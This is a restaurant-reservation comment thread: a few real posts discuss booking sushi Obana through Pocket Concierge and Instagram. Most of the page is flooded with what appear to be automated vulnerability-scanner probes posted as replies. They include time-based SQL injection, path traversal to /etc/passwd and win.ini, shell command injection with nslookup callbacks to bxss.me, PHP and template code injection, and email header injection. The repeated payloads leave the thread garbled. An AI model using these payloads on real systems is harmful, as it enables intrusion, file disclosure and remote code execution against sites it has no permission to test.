\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+291-291-1=0+0+0+1 --
re: guest
-1 OR 3+291-291-1=0+0+0+1 --
re: guest
-1 OR 2+58-58-1=0+0+0+1
re: guest
-1 OR 3+58-58-1=0+0+0+1
re: guest
-1' OR 2+133-133-1=0+0+0+1 --
re: guest
-1' OR 3+133-133-1=0+0+0+1 --
re: guest
-1' OR 2+67-67-1=0+0+0+1 or 'TB3ZOC9V'='
re: guest
-1' OR 3+67-67-1=0+0+0+1 or 'TB3ZOC9V'='
re: guest
-1" OR 2+922-922-1=0+0+0+1 --
re: guest
-1" OR 3+922-922-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
6FBn4ojt'; waitfor delay '0:0:15' --
re: guest
-5 OR 229=(SELECT 229 FROM PG_SLEEP(15))--
re: guest
-5) OR 530=(SELECT 530 FROM PG_SLEEP(15))--
re: guest
-1)) OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: guest
uJFzFk6A' OR 339=(SELECT 339 FROM PG_SLEEP(15))--
re: guest
aq1wxWzc') OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: guest
XYintX21')) OR 70=(SELECT 70 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@VuZDJ
@gomaizo How to make reservation 6 months in advance. In Pocket Concierge, they only allow waiting list till end of August. Thanks
re: Henry
8Lf8Xnif
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
-1 OR 2+665-665-1=0+0+0+1
re: Henry
-1 OR 3+665-665-1=0+0+0+1
re: Henry
if(now()=sysdate(),sleep(15),0)
re: Henry
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Henry
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Henry
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Henry
-1; waitfor delay '0:0:15' --
re: Henry
-1); waitfor delay '0:0:15' --
re: Henry
1 waitfor delay '0:0:15' --
re: Henry
NNvIb2M7'; waitfor delay '0:0:15' --
re: Henry
-5 OR 967=(SELECT 967 FROM PG_SLEEP(15))--
re: Henry
-5) OR 729=(SELECT 729 FROM PG_SLEEP(15))--
re: Henry
-1)) OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: Henry
b1BZvXLU' OR 26=(SELECT 26 FROM PG_SLEEP(15))--
re: Henry
Bqr5xLIn') OR 319=(SELECT 319 FROM PG_SLEEP(15))--
re: Henry
gliEahCV')) OR 797=(SELECT 797 FROM PG_SLEEP(15))--
re: Henry
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Henry
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Henry
'||(select 1 from (select pg_sleep(15))x)||'
re: Henry
''||(select 1 from (select pg_sleep(15))x)||''
re: Henry
1'"
re: Henry
@@j9bkk
re: Henry
HPD6YBHM
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
-1 OR 2+593-593-1=0+0+0+1
re: Henry
-1 OR 3+593-593-1=0+0+0+1
re: Henry
if(now()=sysdate(),sleep(15),0)
re: Henry
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Henry
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Henry
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Henry
-1; waitfor delay '0:0:15' --
re: Henry
-1); waitfor delay '0:0:15' --
re: Henry
1 waitfor delay '0:0:15' --
re: Henry
qOY4KtzZ'; waitfor delay '0:0:15' --
re: Henry
-5 OR 850=(SELECT 850 FROM PG_SLEEP(15))--
re: Henry
-5) OR 746=(SELECT 746 FROM PG_SLEEP(15))--
re: Henry
-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: Henry
Obehu50F' OR 484=(SELECT 484 FROM PG_SLEEP(15))--
re: Henry
34zcVIeW') OR 161=(SELECT 161 FROM PG_SLEEP(15))--
re: Henry
eFzO6hRW')) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
re: Henry
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Henry
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Henry
'||(select 1 from (select pg_sleep(15))x)||'
re: Henry
''||(select 1 from (select pg_sleep(15))x)||''
re: Henry
1'"
re: Henry
@@1S4Oy
re: Henry
1DNFYRPPQSO
re: Henry
%0abcc:074625.67-22339.67.ef4b1.19990.2@bxss.me
re: Henry
response.write(9138612*9705807)
re: Henry
to@example.com>%0d%0abcc:074625.67-22340.67.ef4b1.19990.2@bxss.me
re: Henry
'+response.write(9138612*9705807)+'
re: Henry
"+response.write(9138612*9705807)+"
re: Henry
${9999215+10000214}
re: Henry
<esi:include src="http://bxss.me/rpb.png"/>
re: Henry
../../../../../../../../../../../../../../etc/passwd
re: Henry
../../../../../../../../../../../../../../windows/win.ini
re: Henry
file:///etc/passwd
re: Henry
../../../../../../../../../../../../../../../proc/version
re: Henry
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Henry
'.gethostbyname(lc('hitpu'.'imnlrfif85b5c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(68).chr(107).chr(80).'
re: Henry
../../../../../../../../../../etc/passwd%00.jpg
re: Henry
".gethostbyname(lc("hitbu"."pxlnsetieb525.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(73).chr(104).chr(75)."
re: Henry
)
re: Henry
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Henry
!(()&&!|*|*|
re: Henry
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Henry
^(#$!@#$)(()))******
re: Henry
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Henry
/etc/passwd
re: Henry
echo zztjjr$()\ ntgitq\nz^xyu||a #' &echo zztjjr$()\ ntgitq\nz^xyu||a #|" &echo zztjjr$()\ ntgitq\nz^xyu||a #
re: Henry
%2fetc%2fpasswd
re: Henry
&echo coclzj$()\ kckglv\nz^xyu||a #' &echo coclzj$()\ kckglv\nz^xyu||a #|" &echo coclzj$()\ kckglv\nz^xyu||a #
re: Henry
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Henry
|echo rlkmie$()\ rbpwwb\nz^xyu||a #' |echo rlkmie$()\ rbpwwb\nz^xyu||a #|" |echo rlkmie$()\ rbpwwb\nz^xyu||a #
re: Henry
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Henry
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Henry
(nslookup hitbvdofzsilyc5c6f.bxss.me||perl -e "gethostbyname('hitbvdofzsilyc5c6f.bxss.me')")
re: Henry
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Henry
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Henry
$(nslookup hitwqvmuxypxa9035f.bxss.me||perl -e "gethostbyname('hitwqvmuxypxa9035f.bxss.me')")
re: Henry
Http://bxss.me/t/fit.txt
re: Henry
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Henry
&nslookup hitwrvafbhfva55f95.bxss.me&'\"`0&nslookup hitwrvafbhfva55f95.bxss.me&`'
re: Henry
http://bxss.me/t/fit.txt%3F.jpg
re: Henry
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Henry
&(nslookup hitltuuwfccbu17595.bxss.me||perl -e "gethostbyname('hitltuuwfccbu17595.bxss.me')")&'\"`0&(nslookup hitltuuwfccbu17595.bxss.me||perl -e "gethostbyname('hitltuuwfccbu17595.bxss.me')")&`'
re: Henry
/etc/shells
re: Henry
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Henry
|(nslookup hitqyfnmujncq06f53.bxss.me||perl -e "gethostbyname('hitqyfnmujncq06f53.bxss.me')")
re: Henry
c:/windows/win.ini
re: Henry
file:///etc/passwd
re: Henry
`(nslookup hitjognvwhtwu786da.bxss.me||perl -e "gethostbyname('hitjognvwhtwu786da.bxss.me')")`
re: Henry
bxss.me
re: Henry
/\../\../\../\../\../\../\../etc/passwd
re: Henry
;(nslookup hitwqqyuidkwyd6ce8.bxss.me||perl -e "gethostbyname('hitwqqyuidkwyd6ce8.bxss.me')")|(nslookup hitwqqyuidkwyd6ce8.bxss.me||perl -e "gethostbyname('hitwqqyuidkwyd6ce8.bxss.me')")&(nslookup hitwqqyuidkwyd6ce8.bxss.me||perl -e "gethostbyname('hitwqqyuidkwyd6ce8.bxss.me')")
re: Henry
/WEB-INF/web.xml
re: Henry
C:\WINDOWS\system32\drivers\etc\hosts
re: Henry
../../../../../../../../../../windows/win.ini%00.jpg
re: Henry
/../../../../../../../../../../boot.ini
re: Henry
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Henry
..\..\..\..\..\..\..\..\windows\win.ini
re: Henry
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Henry
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Henry
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Henry
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Henry
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Henry
WEB-INF/web.xml
re: Henry
WEB-INF\web.xml
re: Henry
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Henry
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Henry
';print(md5(31337));$a='
re: Henry
";print(md5(31337));$a="
re: Henry
HttP://bxss.me/t/xss.html?%00
re: Henry
"+"A".concat(70-3).concat(22*4).concat(117).concat(78).concat(115).concat(70)+(require"socket"
Socket.gethostbyname("hitgz"+"rrkxjhznfe20f.bxss.me.")[3].to_s)+"
re: Henry
${@print(md5(31337))}
re: Henry
'+'A'.concat(70-3).concat(22*4).concat(100).concat(88).concat(117).concat(65)+(require'socket'
Socket.gethostbyname('hitit'+'afykovwkf4f99.bxss.me.')[3].to_s)+'
re: Henry
bxss.me/t/xss.html?%00
re: Henry
'"
re: Henry
${@print(md5(31337))}\
re: Henry
<!--
re: Henry
'.print(md5(31337)).'
Message them on IG on your preferred dates.
https://instagram.com/sushi_obana?igshid=MmJiY2I4NDBkZg==
re: guest
EcpMDCo9
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+216-216-1=0+0+0+1
re: guest
-1 OR 3+216-216-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Y7LFRCfD'; waitfor delay '0:0:15' --
re: guest
-5 OR 770=(SELECT 770 FROM PG_SLEEP(15))--
re: guest
-5) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: guest
-1)) OR 384=(SELECT 384 FROM PG_SLEEP(15))--
re: guest
eS6psEsJ' OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: guest
iia1tYq7') OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: guest
rMW0w232')) OR 628=(SELECT 628 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@D5VQI
re: guest
lXcC8xzW
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+858-858-1=0+0+0+1
re: guest
-1 OR 3+858-858-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
rJLyatvO'; waitfor delay '0:0:15' --
re: guest
-5 OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: guest
-5) OR 412=(SELECT 412 FROM PG_SLEEP(15))--
re: guest
-1)) OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: guest
EG2fBuei' OR 16=(SELECT 16 FROM PG_SLEEP(15))--
re: guest
Bo0ZIY9q') OR 688=(SELECT 688 FROM PG_SLEEP(15))--
re: guest
VYapRgPA')) OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@W5n4r
@Henry Sorry, I don't know if there's a way to receive notifications on posts I've commented on and I don't check the site often.
I explained everything in my post.
I made a booking request through Pocket Concierge. Then messaged Obana on Instagram. Then Pocket Concierge came back to me with a confirmed reservation.
re: gomaizo
SXFOomPl
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+905-905-1=0+0+0+1
re: gomaizo
-1 OR 3+905-905-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
